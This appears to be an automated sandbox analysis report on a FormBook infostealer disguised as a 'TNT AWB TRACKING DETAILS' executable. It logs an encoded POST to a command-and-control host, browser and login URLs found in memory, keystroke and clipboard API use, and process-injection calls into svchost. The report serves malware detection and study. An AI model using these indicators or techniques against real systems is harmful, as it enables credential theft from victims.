                    Source: unknownHTTP traffic detected: POST /fm31/ HTTP/1.1Host: www.medicaresbasics.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.medicaresbasics.xyzReferer: http://www.medicaresbasics.xyz/fm31/Cache-Control: no-cacheContent-Length: 210Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 505)Data Raw: 52 44 75 70 47 3d 4f 73 6a 4f 38 76 30 37 62 30 54 6c 48 2f 5a 45 61 49 34 43 75 35 5a 4b 37 78 35 74 72 54 2f 73 77 30 48 77 71 79 62 72 71 65 64 38 6d 6e 4c 48 70 58 62 39 52 51 62 51 65 2f 6b 64 5a 4e 58 57 61 67 48 4a 39 41 35 78 38 69 72 36 6e 63 56 6f 69 72 74 4a 48 34 48 75 6a 58 52 79 6d 4d 7a 74 34 51 31 6d 42 75 4d 64 52 70 4d 43 68 35 73 77 6d 54 63 50 35 2f 6d 4a 69 32 43 4e 76 4b 6f 77 46 6b 54 75 57 57 67 59 45 46 59 50 70 2f 50 67 51 6c 41 72 58 77 33 4f 52 35 6c 56 75 74 64 5a 58 2f 65 38 6a 37 4c 41 5a 71 47 59 75 65 2f 2f 6d 50 58 71 48 71 38 48 75 4d 57 73 43 69 33 63 6f 51 33 41 4a 69 52 42 38 41 73 58 Data Ascii: RDupG=OsjO8v07b0TlH/ZEaI4Cu5ZK7x5trT/sw0Hwqybrqed8mnLHpXb9RQbQe/kdZNXWagHJ9A5x8ir6ncVoirtJH4HujXRymMzt4Q1mBuMdRpMCh5swmTcP5/mJi2CNvKowFkTuWWgYEFYPp/PgQlArXw3OR5lVutdZX/e8j7LAZqGYue//mPXqHq8HuMWsCi3coQ3AJiRB8AsX
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 17:39:49 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 17:39:52 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 17:39:57 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 72 31 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 17 Dec 2024 17:40:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: bRQIkEscRm.exe, 00000009.00000002.3369010830.0000000000FB2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.martmall.info
                    Source: bRQIkEscRm.exe, 00000009.00000002.3369010830.0000000000FB2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.martmall.info/mnch/
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: mobsync.exe, 0000000A.00000003.2856653205.0000000008286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=7
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfC
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfR
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F34164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F34164
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F34164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F34164
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_00234164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00234164
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F33F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F33F66
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00F2001C
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F4CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F4CABC
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0024CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0024CABC

                    E-Banking Fraud

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3370359960.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3370703283.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2674996160.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3369010830.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3371766946.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2680764092.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2686142507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3366041781.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2667870776.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: This is a third-party compiled AutoIt script.0_2_00EC3B3A
                    Source: TNT AWB TRACKING DETAILS.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000000.2122041569.0000000000F74000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ad38727a-0
                    Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000000.2122041569.0000000000F74000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7372f8e5-9
                    Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.2134680187.0000000004273000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_81adc8bc-2
                    Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.2134680187.0000000004273000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e53bcdde-f
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: This is a third-party compiled AutoIt script.2_2_001C3B3A
                    Source: jailkeeper.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: jailkeeper.exe, 00000002.00000000.2135018752.0000000000274000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e4110dfc-d
                    Source: jailkeeper.exe, 00000002.00000000.2135018752.0000000000274000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_3111ad60-1
                    Source: jailkeeper.exe, 00000005.00000002.2306695958.0000000000274000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0007d66e-d
                    Source: jailkeeper.exe, 00000005.00000002.2306695958.0000000000274000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_cd7c8075-f
                    Source: TNT AWB TRACKING DETAILS.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_230423c5-7
                    Source: TNT AWB TRACKING DETAILS.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0be59192-4
                    Source: jailkeeper.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_af66105d-d
                    Source: jailkeeper.exe.0.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_cedc31a1-6
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042C613 NtClose,3_2_0042C613
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72B60 NtClose,LdrInitializeThunk,3_2_03B72B60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03B72DF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B735C0 NtCreateMutant,LdrInitializeThunk,3_2_03B735C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B74340 NtSetContextThread,3_2_03B74340
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B74650 NtSuspendThread,3_2_03B74650
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72BA0 NtEnumerateValueKey,3_2_03B72BA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72B80 NtQueryInformationFile,3_2_03B72B80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72BF0 NtAllocateVirtualMemory,3_2_03B72BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72BE0 NtQueryValueKey,3_2_03B72BE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72AB0 NtWaitForSingleObject,3_2_03B72AB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72AF0 NtWriteFile,3_2_03B72AF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72AD0 NtReadFile,3_2_03B72AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72FB0 NtResumeThread,3_2_03B72FB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72FA0 NtQuerySection,3_2_03B72FA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72F90 NtProtectVirtualMemory,3_2_03B72F90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72FE0 NtCreateFile,3_2_03B72FE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72F30 NtCreateSection,3_2_03B72F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72F60 NtCreateProcessEx,3_2_03B72F60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72EA0 NtAdjustPrivilegesToken,3_2_03B72EA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72E80 NtReadVirtualMemory,3_2_03B72E80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72EE0 NtQueueApcThread,3_2_03B72EE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72E30 NtWriteVirtualMemory,3_2_03B72E30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72DB0 NtEnumerateKey,3_2_03B72DB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72DD0 NtDelayExecution,3_2_03B72DD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72D30 NtUnmapViewOfSection,3_2_03B72D30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72D10 NtMapViewOfSection,3_2_03B72D10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72D00 NtSetInformationFile,3_2_03B72D00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72CA0 NtQueryInformationToken,3_2_03B72CA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72CF0 NtOpenProcess,3_2_03B72CF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72CC0 NtQueryVirtualMemory,3_2_03B72CC0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72C00 NtQueryInformationProcess,3_2_03B72C00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72C70 NtFreeVirtualMemory,3_2_03B72C70
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72C60 NtCreateKey,3_2_03B72C60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B73090 NtSetValueKey,3_2_03B73090
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B73010 NtOpenDirectoryObject,3_2_03B73010
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B739B0 NtGetContextThread,3_2_03B739B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B73D10 NtOpenProcessToken,3_2_03B73D10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B73D70 NtOpenThread,3_2_03B73D70
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F2A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00F2A1EF
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F18310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00F18310
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00F251BD
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_002251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_002251BD
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ECE6A00_2_00ECE6A0
